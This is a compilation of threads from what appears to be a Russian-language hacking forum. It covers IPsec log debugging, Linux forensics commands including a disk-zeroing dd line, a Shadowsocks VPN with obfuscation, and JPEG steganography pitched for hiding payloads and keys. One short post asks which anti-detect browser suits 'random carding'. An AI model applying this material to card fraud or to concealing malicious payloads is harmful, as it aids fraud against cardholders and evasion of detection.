config setup conn tunnel-east left=203.0.113.10 right=192.0.2.10 leftsubnet=10.40.50.0/24 rightsubnet=10.20.30.0/24 leftsubnet=10.40.50.0/24 ike=aes128-sha1-modp2048! keyexchange=ikev2 reauth=no ikelifetime=28800s closeaction=none esp=aes128-sha1! keylife=3600s rekeymargin=540s type=tunnel compress=no authby=secret auto=route keyingtries=1

Code:Copy to clipboard

203.0.113.10 192.0.2.10 : PSK "qwerty"

Проверить состояния туннелей можно командой sudo ipsec statusall. Если ты нигде не ошибся, ты увидишь там что-то вроде такого:

Code:Copy to clipboard

Security Associations (1 up, 0 connecting): tunnel-west[5]: ESTABLISHED 65 minutes ago, 192.0.2.10[192.0.2.10]...203.0.113.10[203.0.113.10] tunnel-west[5]: IKEv2 SPIs: 625b6b882998fc83_i* edc6c365bf5aaabc_r, rekeying in 6 hours tunnel-west[5]: IKE proposal: AES_CBC_128/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_2048

Погасить или поднять туннель вручную можно командами вида sudo ipsec up/down tunnel-west.

Включаем отладочные сообщения
По умолчанию strongSwan не показывает в логах никаких деталей происходящего. Это решение авторов в чем-то можно понять — если все работает, детальная запись диалога IKE будет просто ненужным шумом.

Если у тебя есть возможность править файлы настроек, то выбор опций там весьма широк. Применить изменения без перезапуска демона можно командой swanctl --reload- settings либо отправкой сигнала SIGHUP процессу charon.

Увы, в специализированных сетевых дистрибутивах этой возможности может и не быть — они бывают весьма чувствительны к попыткам что-то сделать в обход их интерфейса. Но не все потеряно! Если у тебя есть доступ по SSH, уровень детализации логов у работающего демона можно поменять командой sudo ipsec stroke loglevel ike 3.

Уровни детализации бывают от -1 (не писать ничего) до 4 (выводить все, вплоть до секретных ключей). Уровень 3 включает вывод дампов пакетов, но не запись в логи секретной информации — оптимально для наших целей.

В IKE, увы, не предусмотрен механизм отправки детальных отчетов об ошибках — инициатору обычно придет просто no proposal chosen. Поэтому включать отладочные сообщения и смотреть их нужно на принимающей стороне. Если ты вынужден отлаживать неработающий туннель, переведи свой маршрутизатор в пассивный режим, в strongSwan — опцией auto=route.

Несовместимые версии IKE
Нужно помнить, что существуют две версии IKE: старая IKEv1 и новая IKEv2. Вторая версия протокола решает очень много проблем первой: определение и настройка NAT traversal в большинстве случаев просто работает, в одном туннеле можно совместить несколько локальных и удаленных сетей, а полноценный механизм keepalive наконец позволил обеим сторонам видеть, что туннель все еще жив.

Однако IKEv1 и IKEv2, по сути, разные и не вполне совместимые протоколы. До версии 5.0 в strongSwan за них даже отвечали разные демоны (pluto и charon). В новых версиях вся функциональность объединена в charon, но различий между протоколами меньше не стало, и автоматический даунгрейд с IKEv2 на IKEv1 все так же невозможен.

В strongSwan версия протокола указывается опцией keyexchange. Пропишем в конфиг стороны east опцию keyexchange=ikev1, перезапустим туннель и посмотрим, что будет. На east мы получим то самое весьма расплывчатое сообщение no proposal chosen независимо от детализации логов.

Code:Copy to clipboard

rtr-east charon[13411]: 06[NET] sending packet: from 192.0.2.10[500] to 203.0.113.10[500] (336 bytes) rtr-east charon[13411]: 08[NET] received packet: from 203.0.113.10[500] to 192.0.2.10[500] (36 bytes) rtr-east charon[13411]: 08[ENC] parsed IKE_SA_INIT response 0 [ N(NO_PROP) ] rtr-east charon[13411]: 08[IKE] received NO_PROPOSAL_CHOSEN notify error rtr-east charon[13411]: 08[IKE] IKE_SA tunnel-west[2] state change: CONNECTING => DESTROYING

На второй стороне в этом случае можно увидеть сообщение no IKE config found.

Code:Copy to clipboard

rtr-west charon[14183]: 14[IKE] no IKE config found for 203.0.113.10...192.0.2.10, sending NO_PROPOSAL_CHOSEN

Решение: сообщить админу второй стороны свою версию IKE и попросить удостовериться в ее совпадении.

Неверный ключ
Если в твоих настройках адреса маршрутизаторов прописаны явно, сообщение будет вида MAC mismatched. Здесь MAC означает Message Authentication Code.

Code:Copy to clipboard

rtr-east charon[13411]: 16[IKE] tried 1 shared key for '192.0.2.10' - '203.0.113.10', but MAC mismatched

Несовместимые опции шифрования и PFS
PFS (Perfect Forward Secrecy) — это механизм обеспечения долговременной криптостойкости. Суть его в том, что на основе общего ключа вычисляется временный сессионный ключ. Сам по себе общий ключ никогда не используется напрямую: при установке соединения сразу генерируется временный ключ, который затем меняется по расписанию или при разрыве соединения. Таким образом, даже если злоумышленники подберут ключ, они получат только доступ к трафику текущей сессии. Когда время действия ключа истечет, им придется подбирать его заново, что непрактично.

Сессионный ключ вычисляется с помощью алгоритма Диффи — Хеллмана (DH), классического или на основе эллиптических кривых.

Подход к настройке PFS в сетевых устройствах бывает самым разным. В некоторых системах можно встретить настройку вроде PFS enable/disable, что так же бессмысленно, как опция «включить шифрование». Не бывает «просто» шифрования, бывает конкретный шифр и конкретный режим его работы, например AES-128-CBC. Не бывает и «просто» алгоритма выработки сессионных ключей.

На практике опция «включить PFS», как правило , подразумевает протокол DH group 2 (modp1024). Кстати, он уже считается устаревшим и небезопасным. Бывают и другие варианты, так что нужно уточнять в документации. Но можно это увидеть и в логах.

При высоких уровнях детализации strongSwan покажет тебе received proposals (что предлагает инициатор) и configured proposals (что настроено на твоей стороне).

Для эксперимента поменяем в конфиге west опцию esp=aes128-sha1! на esp=aes-128-sha1-modp2048!.

Мы увидим в логах следующее:

Code:Copy to clipboard

rtr-west charon[14183]: 08[CFG] received proposals: ESP:AES_CBC_128/HMAC_SHA1_96/MODP_2048/NO_EXT_SEQ rtr-west charon[14183]: 08[CFG] configured proposals: ESP:AES_CBC_128/HMAC_SHA1_96/NO_EXT_SEQ rtr-west charon[14183]: 08[IKE] no acceptable proposal found

Порядок следования опций: шифр, хеш, PFS. Здесь мы видим, что шифр (AES-128) и хеш (SHA-1) совпадают, вся разница в опции MODP_2048: она есть в received proposals, но отсутствует в configured. Все опции с префиксами MODP и ECP — это названия групп для протокола DH. Соответствие номеров групп и обозначений MODP/ECP можно найти в [документации к strongSwan](https://wiki.strongswan.org/projects/strongswan/wiki/IKEv2CipherSuites#Diffie- Hellman-Groups).

Несовместимость шифра и хеша встречается реже, поскольку во всех системах их надо указывать явно — забыть их указать невозможно. Но теперь ты уже знаешь, куда смотреть. Формат опции шифра: $name_$mode_$keyLength. В нашем примере выше указан AES в режиме CBC с длиной ключа 128 бит.

Туннель «жив», а трафик не идет
Бывает и такое, и не так редко — особенно с IKEv1. По данным из вывода sudo ipsec statusall вроде все в норме, но трафик уходит и не возвращается. Дело в том, что в IKEv1 нет обязательного механизма двустороннего обмена пакетами keepalive. Таким образом, в промежутках между истечением времени жизни ключа процесс IKE никак не контролирует происходящее и реализация AH/ESP (то есть ядро ОС или аппаратный криптопроцессор) предоставлены сами себе. Пакеты будут шифроваться и отправляться, даже если на другой стороне никто не готов их принять.

Для борьбы с этим предназначены опции DPD (Dead Peer Detection). Однако значения тайм-аутов не входят в proposal и не согласуются между сторонами, так что даже при включенном DPD одна сторона может считать туннель живым куда дольше другой — в пределе до истечения IKE timeout, который может составлять много часов.

Если у тебя возникла такая проблема, не забывай уточнить у админа второй стороны значения всех таймеров DPD. Но еще лучше сразу уговаривай всех на IKEv2, где такие проблемы менее вероятны.

Заключение
Со стороны чтение логов IPsec может показаться особым искусством. Но если внимательно изучить детали работы протокола IKE, сообщения становятся куда понятнее, а отладка — быстрее.

автор Даниил Батурин
xakep.ru/author/dmbaturin

Введение в форензику

ID: 676533bbb4103b69df371cae
Thread ID: 40826
Created: 2020-08-12T18:23:14+0000
Last Post: 2020-08-12T18:32:33+0000
Author: tabac
Prefix: Статья
Replies: 1 Views: 1K

Компьютерная криминалистика (форензика) — прикладная наука о раскрытии преступлений, связанных с компьютерной информацией, об исследовании цифровых доказательств, методах поиска, получения и закрепления таких доказательств. Она состоит из трёх частей:

Сбор данных — процесс получения информации из первоисточника без их повреждения или изменения. Для этого есть множество инструментов в зависимости от ОС и других особенностей, в статье рассмотрим инструменты на основе Linux.

Сохранение данных — полученные цифровые улики должны быть сохранены в своем первоначальном состоянии, используя криптографические алгоритмы хэширования.

Анализ данных — интерпретация данных и извлечение информации из них.

Сбор данных
Если подозреваемый установил руткиты для уничтожения улик по команде, существует вероятность потери важного контента. В таких случаях применяется цепочка хранения доказательств — документ с информацией о том, как обрабатывались улики, для дальнейшей отчётности. Цепочка начинается с обработки улик.

Перед началом нужна подготовка:

загрузочный диск или флешка, поскольку инструментам подозреваемых нельзя доверять;

мощная машина для следователя.

Сначала нужно получить данные, которые наиболее изменчивы. На самом деле они изменяются уже при их сборе, поэтому надо постараться оставить как можно меньше следов. Это сложная задача, поскольку обычные инструменты могут внести изменения в исследуемую среду. Например, использование команды cp изменит время последнего доступа к исходному файлу. Рассмотрим некоторые инструменты.

Code:Copy to clipboard

$ lsof

Эта команда выведет список всех открытых файлов, принадлежащих любым активным процессам. Её можно использовать с различными параметрами. Например, lsof -i IP_adress будет перечислять список интернет-соединений, принадлежащих данному IP-адресу. Она также поможет найти вредоносные процессы, которые используют скрытые дисковые пространства.

Code:Copy to clipboard

$ nc

Netcat использует сетевые подключения для чтения и записи через протоколы TCP или UDP. Эту команду можно использовать для передачи или извлечения данных на рабочую станцию эксперта.
Также стоит взглянуть на uname -a ,ifconfig ,date и uptime. Всё это может пригодиться для сбора улик. Можно проверить, подключён ли злоумышленник к целевой машине, используя w.

Для считывания памяти можно использовать lime — загружаемый модуль ядра, который позволяет извлекать данные из энергозависимой памяти Linux.

Для энергонезависимых данных следует использовать dd. Этот инструмент встроен в большинство систем Linux. Допустим, для подготовки экспертного диска и затирания /dev/hda одними нулями можно использовать dd if=/dev/zero of=example. Скопировать улики можно следующим образом: dd if=stuff of=evidence/stuff.dd. Если использовать dd с netcat , сначала устанавливается слушатель, а затем ему отправляются данные.

Терминал слушателя:

Code:Copy to clipboard

$ nc -l 8888 > nc_info

Терминал отправителя:

Code:Copy to clipboard

$ dd if=stuff | nc localhost 8888

Сохранение данных
Для сохранения доказательств экспертиза использует криптографические алгоритмы хеширования . Суть компьютерной криминалистики — доказать, что улики совпадают с первоисточником, для этого достаточно вычислить хеши. Если хеши одинаковы, два файла должны быть одинаковыми.

Для этого хорошо подойдёт MD5 или SHA. Рассмотрим команду md5sum. Создадим файл ex_file , содержащий строку « hello there ». Прочтём исходное содержимое с помощью cat , а затем вычислим хеш.

Code:Copy to clipboard

$ echo "hello there" > ex_file $ cat ex_file hello there $ md5sum ex_file 2d01d5d9c24034d54fe4fba0ede5182d ex_file

Если изменить файл, например, добавив в строку «hiya», хеш изменится.

Code:Copy to clipboard

$ echo "hiya" >> ex_file $ cat ex_file hello there hiya $ md5sum ex_file ddfdaf6c131be9a522038488f6823537 ex_file

Совсем другое дело, если есть два файла с одинаковым содержимым, но разными именами.

Code:Copy to clipboard

$ echo "hello world" > file1 $ echo "hello world" > file2 $ md5sum file1 6f5902ac237024bdd0c176cb93063dc4 file1 $ md5sum file2 6f5902ac237024bdd0c176cb93063dc4 file2

Как можно видеть, хеш одинаковый. Другим примером этого является изменение разрешений.

Code:Copy to clipboard

$ chmod g-r file2 $ md5sum file2 6f5902ac237024bdd0c176cb93063dc4 file2

Хеш остался прежним.

Анализ данных
Получение полезной информации из данных является важной задачей. Начать можно с определения разделов с помощью fdisk our_device. После этого можно использовать dd для выделения наиболее примечательных разделов. С помощью инструмента Sleuthkit получаем файл с информацией о разделах (команда mmls our_file.dd). Можно определить тип носителя с помощью опции -t (команда mmls -t dos our_file.dd). Для монтирования образов можно использовать mount. Монтирование должно быть только в режиме чтения (read-only).

Code:Copy to clipboard

mount –o ro,loop /my_file.dd/mnt/example

Не менее важная вещь — MAC. Этот инструмент даёт доступ к нужной информации, например, дате создания или изменения файлов. Такую проверку следует проводить в начале экспертизы, так как такая информация очень чувствительна к изменениям. Используйте комбинацию команд fls и mactime.

Code:Copy to clipboard

$ fls -f ext3 -m "/" -r images/root.dd > data/body $ mactime -b filename [time]

Мы рассмотрели лишь малую часть инструментов для компьютерной криминалистики. В форензике очень важно умело владеть инструментами операционной системы. Если вы хотите лучше изучить Linux, советуем эту подборку книг.

Спасибо за прочтение!

Создание своего VPN с помощью Shadowsocks и обфускация трафика

ID: 676533bbb4103b69df371cb4
Thread ID: 40267
Created: 2020-07-31T19:32:14+0000
Last Post: 2020-07-31T19:32:14+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 1K

К написанию этой статьи привело размышление: "А так ли эффективны сервисы VPN и Tor в частности?" И вот, после недолгого гугления всплыли неутешительные факты:

Провайдеры детектят любой подозрительный трафик и намеренно занижают скорость интернет-соединения

Они же (и те, кто держат сервера с VPN) идут на поводу у РосКомНадзора/Федеральной комисси по связи/etc. , и при надобности могут выдать последним ключи шифрования

Некоторые провайдеры VPN вообще не шифруют трафик

Как правило, на серверах VPN используют OpenVPN, либо же его модифицированную версию (минус ли это - решать вам)

Провайдеры VPN ограничивают количество устройств на тарифе, или режут определённый вид трафика (например, торренты)

Tor, хоть и шифрует трафик, не обеспечивает полную анонимность - на выходной ноде вполне возможно перехватывать трафик, да и на многие сайты с ним невозможно зайти

Возникает закономерный вопрос - так чем, черт возьми, пользоваться? Тут ответ приходит, внезапно, из Китая - Shadowsocks.

Что это такое?
Как говорит нам англоязычная Википедия: "Shadowsocks - это бесплатный проект протокола шифрования с открытым исходным кодом, широко используемый в материковом Китае для обхода цензуры в Интернете". Действительно, он там используется для обхода знаменитого "Золотого щита", которым так гордится китайское правительство, и делает это весьма успешно.
Работает он в связке "Сервер-клиент" - трафик шифруется у клиента, пересылается на сервер, там расшифровывается и выпускается в Интернет. Причём и сервер, и клиент вы настраиваете сами - никакой утечки информации или попадании её не в те руки, плюс вы сами вольны выбирать алгоритм шифрования.
Более подробную информацию можно получить на сайте проекта

Подготовительный этап
Для начала нам потребуется сервер. Где его брать я вам говорить не буду, т.к. в интернете много компаний предоставляют облачные сервера. Для Shadowsocks достаточно самого дешёвого - мой крутится на сервере с 1 ядром, 400 мегабайтами оперативной памяти и 5 гигабайтами дискового пространства, и этого вполне хватает. Главный же критерий тут - скорость соединения и место расположения сервера - для обхода блокировок лучше брать в Америке, Франции или Италии. Главное - безлимитный трафик (но если вы пользуетесь интернетом не так активно, то можно и ограниченный)
Далее переходим к выбору серверной ОС - тут желательно выбрать Ubuntu 64x, но можно либо Debian, либо CentOS. В этой же статье будет описываться сервер с Ubuntu 18.04
Если вы желаете полной анонимности, то платить за такой сервер следует биткойнами, и нигде не указывать свои данные (но это уже для незаконных действий, благо мы с вами не такие)

Настройка сервера
Сервер арендован, ОС поставлена, можно приступать к настройке самого Shadowsocks
Сначала обновимся

apt update && apt upgrade

Затем поставим сам Shadowsocks

apt install shadowsocks-libev

Тут нужно небольшое пояснение: shadowsocks-libev - Shadowsocks, переписанный на чистом Си

Затем откроем конфигурационный файл редактором nano

nano /etc/shadowsocks-libev/config.json

Следует рассказать о назначении некоторых параметров:

server - адрес вашего сервера, следует заменить на реальный адрес вашего сервера

server_port - порт, на котором будет открыт ваш сервер, можно поменять на любой, кроме тех, которые уже заняты

local_port - порт для связи внутри сервера, оставьте дефолтным

password - пароль от вашего соединения, поменяйте на более заковыристый

timeout - время, после которого сервер разрывает соединение, если не поступило никаких данных. Вместо 60 секунд лучше ввести 10, т.к. больше многие клиенты не поддерживают

method - метод шифрования трафика, лучше оставить дефолтным, либо поменять на предпочтительный

Остальных параметров нет в оригинальном файле, но в дальнейшем мы их введём.
Сохраняем файл при помощи Ctrl-O, Enter, а затем выходим с помощью Ctrl-X. Советую вам где-нибудь записать или сфотографировать всё то, что мы ввели.
Теперь добавим Shadowsocks в автозапуск:

systemctl enable shadowsocks-libev
systemctl restart shadowsocks-libev

Ну вот и всё! Базовый сервер настроен, перейдём к настройке клиента

**Настройка клиента

Windows**
Идём на официальный сайт и качаем клиент для Windows
Затем распаковываем в удобное для нас место (Я распаковывал в корень C), запускаем, и видим следующее:

Заполняем все пункты так же, как и в конфигурационном файле, порт прокси не трогаем, нажимаем "Применить", и всё!
Состояние программы будет отображать значок в трее. Там же нужно поставить галочку по пути "Системный прокси-сервер -> Для всей системы", и автозапуск (по желанию)

Android
В Google Play ищем приложение Shadowsocks, устанавливаем, и настраиваем по аналогии с Windows

(Совет: Дабы не мучаться с вводом длинного пароля, можно выбрать в приложении пункт "Сканировать QR-код", а на Windows (где клиент уже настроен) выбрать пункт меню "Серверы ->
Поделиться конфигурацией сервера")

Linux
Копируем в терминал ту же самую команду, которую мы использовали для установки Shadowsocks на сервере.
Затем открываем с помощью nano конфигурационный файл:

nano /etc/shadowsocks-libev/config.json

И заполняем аналогично тому, как мы заполняли его на сервере
Затем вводим следующее для запуска:

sudo ss-local -c /etc/shadowsocks-libev/config.json

Чтобы соединение было и после перезапуска клиента, добавляем сервис, создав файл ss-local.service:

sudo nano /etc/systemd/system/ss-local.service

В него вставляем следующее:

Code:Copy to clipboard

[Unit] Description=Daemon to start Shadowsocks Client Wants=network-online.target After=network.target [Service] Type=simple ExecStart=/usr/bin/ss-local -c /etc/shadowsocks/config.json [Install] WantedBy=multi-user.target

Выходим, и прописываем последнюю команду:

sudo systemctl daemon-reload && sudo systemctl enable ss-local.service && sudo systemctl start ss-local.service

Теперь перейдём к обфускации трафика

Обфускация трафика
Для чего она нужна? Ну, прежде всего, это дополнительная защита вашего трафика от прослушивания: тот, кто попытается отследить ваши посещения, будет путаться

то ли вы На Ютуб зашли, то ли вы картинки с котиками смотрите
Хватит болтовни, приступим к делу.
Для начала скачиваем плагин:

Code:Copy to clipboard

apt install simple-obfs

Затем нам потребуется отредактировать конфиг:

Code:Copy to clipboard

nano /etc/shadowsocks-libev/config.json

В нём мы добавляем в самый конец две строчки, которые мы пропустили во время первоначальной настройки:

plugin - активирует этот самый плагин, туда вставляем "obfs-server"

plugin_opts - задаёт параметры запуска плагина, в данном случае вводим как на картинке, подставляя вместо www.vk.com любой сайт

Перезапускаем всё это добро:

Code:Copy to clipboard

systemctl restart shadowsocks-libev

Перейдём к настройке клиентов:

в Windows - скачиваем плагин с данного сайта, и распаковываем в директорию Shadowsocks. Затем, в Редактировании серверов в поле Плагин вставляем obfs-local, а в поле Опции плагина - всё то же самое, что мы вставляли в конфиг

на Android - скачиваем в Google Play Simple Obfuscation, и в настройках конфига сервера Shadowsocks, в графе Плагины, выбираем данное приложение и вводим всё так же, как на Windows

в Linux - скачиваем плагин (та же команда, что и для сервера), редактируем конфиг, добавляя эти два параметра, и перезагружаем клиент

Ну, вот и всё! Персональный сервер с VPN и обфускацией трафика готов!

Далее будет рассмотрен плагин v2ray , пришедший на замену simple-obfs (который уже устарел), и то, как создать подобие сети Tor с входными и выходными нодами.

Вы спросите: "Ну, насчёт первого понятно, а зачем второе?"

Я отвечу - так вас будет сложнее отследить: весь трафик, который будет приходить на входную ноду, будет пересылаться на выходную ноду, а уж там выпускаться во Всемирную сеть. Благодаря этому тот, кто попытается вас найти, следя, кто писал с этого IP, и кто в это же время к нему подключался, останутся ни с чем.

Ну что, приступим!

Начнём с настройки сервера с плагином v2ray.

v2ray

Настройка сервера

Ну, начнём с очевидного - вам нужен сервер. Как его выбрать - смотрите в первой статье. ОС, которая использовалась на сервере для написания данной статьи - Ubuntu 18.04 64x.

Сначала обновимся:

Code:Copy to clipboard

sudo apt update && sudo apt upgrade

Затем установим сам shadowsocks:

Code:Copy to clipboard

sudo apt install shadowsocks-libev

Затем идём на данную страницу <https://github.com/shadowsocks/v2ray- plugin/releases>, копируем ссылку на последний релиз для нашего сервера и скачиваем его командой wget:

Code:Copy to clipboard

wget https://github.com/shadowsocks/v2ray-plugin/releases

Распаковываем скачанный архив (название может отличатся):

Code:Copy to clipboard

sudo tar -xf v2ray-plugin-linux-amd64-v1.3.0.tar.gz

Переносим плагин в удобное место и переименовываем его:

Code:Copy to clipboard

sudo mv v2ray-plugin_linux_amd64 /etc/shadowsocks-libev/v2ray-plugin

Теперь разрешим плагину и Shadowsocks использовать привилегированные порты:

Code:Copy to clipboard

sudo setcap 'cap_net_bind_service=+eip' /etc/shadowsocks-libev/v2ray-plugin sudo setcap 'cap_net_bind_service=+eip' /usr/bin/ss-server

Создаём файл конфигурации, с которым будет работать Shadowsocks, в nano :

Code:Copy to clipboard

sudo nano /etc/shadowsocks-libev/v2ray.json

и вставляем следующее:

JSON:Copy to clipboard

{ "server":"0.0.0.0", "server_port":443, "password":"ваш пароль", "local_port":1080, "timeout":300, "method":"chacha20-ietf-poly1305", "fast_open":true, "reuse_port":true, "plugin":"/etc/shadowsocks-libev/v2ray-plugin", "plugin_opts":"server", "nameserver":"ваш DNS сервер" }

В поля password и nameserver вставляем ваши пароль и адрес DNS сервера соответственно. Также вы можете изменить метод шифрования, если вас не устраивает этот. Сохраняемся (Ctrl-O, Enter) и выходим (Ctrl-X)

Теперь создадим сервис ss-v2ray.service:

Code:Copy to clipboard

sudo nano /etc/systemd/system/ss-v2ray.service

И вставим в него следующее:

Code:Copy to clipboard

[Unit] Description=Shadowsocks-libev with V2RAY-websocket obfuscation Documentation=man:shadowsocks-libev(8) After=network.target [Service] Type=simple User=nobody Group=nogroup LimitNOFILE=51200 ExecStart=/usr/bin/ss-server -c /etc/shadowsocks-libev/v2ray.json [Install] WantedBy=multi-user.target

Сохраняемся и выходим.

Затем включаем и рестартуем сервис:

Code:Copy to clipboard

sudo systemctl enable ss-v2ray.service && sudo systemctl restart ss-v2ray.service

Настройка сервера завершена!

Настройка клиента
Пара нюансов:
1. В Windows вам нужно скачать версию под вашу архитектуру, и переименовать её в v2ray.exe, а в настойках Shadowsocks, в Опциях плагина указать параметр host=example.com, где example.com - тот сайт, куда "идёт" трафик
2. В Linux - скачиваем плагин, перемещаем туда же, куда перемещали и на сервере. Затем в config.json указываем всё то же, что указывали в v2ray.json, меняя 0.0.0.0 в строке "server" на адрес сервера, и "server" на "host=example.com" в строке "plugin_opts"
3. На Android - просто скачиваем v2ray plugin в Google Play и указываем в настройках плагина, в опции host, любой сайт

Настройка клиента завершена!

Теперь перейдём к созданию подобия сети Tor

ShadowTor (да, я решил это так назвать, и не спрашивайте зачем)
ВНИМАНИЕ! Здесь требуется уже 2 сервера

Настройка выходной ноды
Выходная нода настраивается точно также, как и просто сервер с Shadowsocks (советую поставить на него v2ray или simple-obfs)

Настройка входной ноды
На неё мы ставим Shadowsocks, и настраиваем как клиент, чтобы он подключался к нашей выходной ноде
Затем ставим HAProxy:

Code:Copy to clipboard

sudo apt install haproxy

Потом нам нужно отредактировать файл настроек HAProxy:

Code:Copy to clipboard

nano /etc/haproxy/haproxy.cfg

В котором заменим строку в секции default:

Code:Copy to clipboard

mode http

на

Code:Copy to clipboard

mode tcp

Затем, в самый конец файла, мы вставим следующее:

Code:Copy to clipboard

frontend ss-in bind *:80 default_backend ss-out backend ss-out server server1 127.0.0.1:1080

И всё!
Перейдём к настройке клиента

Настройка клиента
Здесь нет ничего сложного - просто настраиваем использование интернета программами через SOCKS5 прокси, который теперь находится по адресу ip_входной_ноды:80

Теперь весь трафик сначала будет идти на входную ноду, затем от неё на выходную, а только лишь потом - в интернет.

Автор по материалам статьи @Knotoni
codeby.net

Best B/W Anti Detect vs Linkensphere vs Kameleo

ID: 676533bbb4103b69df371cb6
Thread ID: 39955
Created: 2020-07-23T15:39:43+0000
Last Post: 2020-07-30T19:26:50+0000
Author: system32
Replies: 10 Views: 1K

Guys, i would like most of you who have use the above browsers to kindly advice which best and why.
i have heard about Anti Detect so much but have never been able to hear much about Liken Sphere
and Kameleo. Kameleo from their video demo looks like it will beat the other two but you can help me
make great decision to avoid wasting money. the purpose of buying it is for random carding.
thanks for your suggestions and opinions.

Стеганография: Прячем данные в JPEG-изображениях

ID: 676533bbb4103b69df371cb7
Thread ID: 40197
Created: 2020-07-30T10:32:59+0000
Last Post: 2020-07-30T18:11:54+0000
Author: tabac
Prefix: Статья
Replies: 2 Views: 1K

Вы когда-нибудь задумывались, как такие инструменты, как ExifTool или Stegano, работают изнутри? Быть может, хотели создать свою собственную программу для встраивания секретных данных в изображения?

В этом небольшой статье я расскажу о том, как встраивать секретные данные в файлы изображений. Это то, что может стать вашим коронным номером на вечеринке, CTF или, что более интересно, вы можете воспользоваться этим для скрытия полезных нагрузок или ключей дешифрования.

Основы
Чтобы понять, как встраивать секретные данные в файлы изображений, сначала необходимо понять, как выглядит файловая структура JPEG.

В качестве примера, давайте возьмем любое изображение в данном формате и бросим его в шестнадцатеричный редактор (например, HxD):

Этот hexdump выглядет впечатляюще (если вы ранее не работали с чем-то схожим), однако, волноваться не стоит. Я сейчас объясню каждый фрагмент, необходимый нам для работы, не более. Существует несколько важных байтов, которые будут полезны при стеганографии.

FF xx байты обозначают маркеры в структуре JPEG-файлов, маркеры используются для различных вещей, таких как метаданные, миниатюры изображений, обозначения начала и конца файлов JPEG, и многое другое.

Для нашей цели важны следующие маркеры:
FF D8 => Это маркер, обозначающий начало потока данных JPEG
FF D9 => Это маркер, обозначающий окончание потока данных JPEG
FF DA => Это маркер, показывающий фактическое начало JPEG-картинки.

В результате каждый из этих 4 байтов будет присутствовать буквально в любом существующем файле JPEG, и это полезная информация, если вы хотите проанализировать изображения JPEG и вам необходимо выяснить, где они начинаются и заканчиваются.

Маркеры всегда следуют одному и тому же соглашению (за исключением маркера FF D8):
FF => Начало маркера
xx => буквально любое шестнадцатеричное значение (1 байт), чтобы «идентифицировать» маркер.
xx xx => 2 байта пространства данных, обозначающих размер маркера.

ВАЖНО: этот общий размер ДОЛЖЕН включать в себя и эти 2 байта! (пример: если вам нужен размер 32 байта, вам действительно нужно выделить 34 байта!)

DATA => все ваши байты данных

Примечание. Некоторые значения уже зарезервированы. С полным списком можно ознакомиться тут: https://www.disktuna.com/list-of-jpeg-markers/

Выбор правильного маркера и перезапись данных

Лучшим решением для скрытия своих данных в изображении будет использование следующих маркеров:

FF E2 - FF EF => маркеры приложения, которые не используются для декодирования изображения JPEG, они обычно используются для метаданных.

FF FE => это маркер «комментария», который также игнорируется декодерами JPEG.

Эти маркеры - именно то, что мы будем использовать, чтобы скрывать данные в любом JPEG-изображении.

Прежде чем начать , вы должны знать, что если вы начнете перезаписывать данные в другом маркере, вы сломаете изображение.

Я бы вообще не советовал переписывать что-либо, чего вы не знаете - работайте лишь с тем, что знаете наверняка.

Основным преимуществом данного подхода является его использование для вставки полезной нагрузки в изображении.

Недостатком же этого является то, что размер изображения станет больше при использовании прямой вставки.

Пример: скрытие ключа расшифровки AES-256
Скрытие ключа для расшифровки (публичный ключ) AES-256 в изображении было бы довольно хорошим вариантом использования в нашем случае, AES-256 - это надежный алгоритм шифрования, и скрытие ключа в картинке не будет раздувать изображение так же сильно, как скрытие всей полезной нагрузки.

Ключ AES-256 требует 32-буквенного предложения / слова (1 символ - 1 байт => 32 байта = 256 бит, если вы не знакомы с байтами и битами). Я выбрал следующий ключ: ThisIsAsuperSecretDecryptionKey!

Не верите, что здесь 32 байта? Может быть, вы поверите консоли PowerShell:

Теперь, представим данный ключ в hex:

Когда у нас есть ключ правильной длины и шестнадцатеричное значение этого ключа, мы можем начать процесс скрытия данных:

FF => Начало маркера

FE => означает, что мы делаем «комментарий».

00 22 => 2 байта пространства данных, обозначающих размер маркера (34 - 00 22 в шестнадцатеричном формате)

54686973497341537570657253656372657444656372797074696f6e4b657921 => (шестнадцатеричное значение ThisIsAsuperSecretDecryptionKey!)

Мы можем ВСТАВИТЬ(не перезаписывая) этот маркер непосредственно перед началом любого другого маркера (FF), находящегося перед маркером FF DA (фактическим началом изображения).

Заметите разницу?

Они выглядят одинаковыми на первый взгляд... но давайте заглянем внутрь:

Альтернативный подход + Обнаружение
Другой безопасный подход - добавить полезную нагрузку после маркера конца изображения (FF D9). Так работают большинство программ для стеганографии. Вы даже можете замаскировать свою полезную нагрузку, добавляя ненужные данные впоследствии, чтобы полезная нагрузка находилась не только в конце hexdump. Все, что осталось сделать, это написать программу, которая будет искать ваш ключ дешифрования в образе hexdump ?

Обнаружить это довольно сложно, так как владельцу организации придется проверять все изображения, которые загружаются работниками.

оригинал <https://blog.nviso.eu/2020/07/13/how-to-embed-secret-data-in-jpeg- files/>
Перевод Moody канал Cybred

Защищаем свою WIFI сеть от взлома

ID: 676533bbb4103b69df371cbd
Thread ID: 39297
Created: 2020-07-06T07:43:21+0000
Last Post: 2020-07-18T14:54:39+0000
Author: Igata_Ru
Replies: 6 Views: 1K

Приветствую хацкеры, в данном материале вы узнаете что такое защита WIFI сети от злоумышленников и как активно противостоять хакерам которые пытаются взломать ваш роутер.

Основы защиты беспроводных сетей
Безопасность беспроводной сети специально создана для того, чтобы неавторизованные пользователи не могли получить доступ к вашей беспроводной сети и украсть конфиденциальную информацию. Тип беспроводной безопасности, которую использует отдельный пользователь, определяется его беспроводным протоколом.

Сегодня многие дома и компании работают и полагаются на беспроводные сети. Wi- Fi невероятно эффективен для поддержания пользователей подключенными к интернету 24 часа в сутки каждый день недели. Вышеупомянутое преимущество в сочетании с тем, что он поставляется без помех, делает беспроводную сеть еще более привлекательной.

Однако есть и другая сторона, поскольку сигналы Wi-Fi могут транслироваться за пределами дома или компании. Это означает, что Wi-Fi уязвим для хакеров; увеличивая легкий доступ людей в соседних домах или даже людей на соседней парковке. Вот тут-то и возникает важность обеспечения надежной беспроводной безопасности.

Вы можете задаться вопросом, что представляет собой опасность, если она вообще существует, для других людей, имеющих доступ к вашему Wi-Fi. Ну, есть ряд опасностей для уязвимой беспроводной сети. Например, хакеры смогут получить доступ к личной информации, украсть вашу личность и использовать ее против вас. Были случаи, когда люди попадали в тюрьму за преступление, которое они не совершали через интернет.

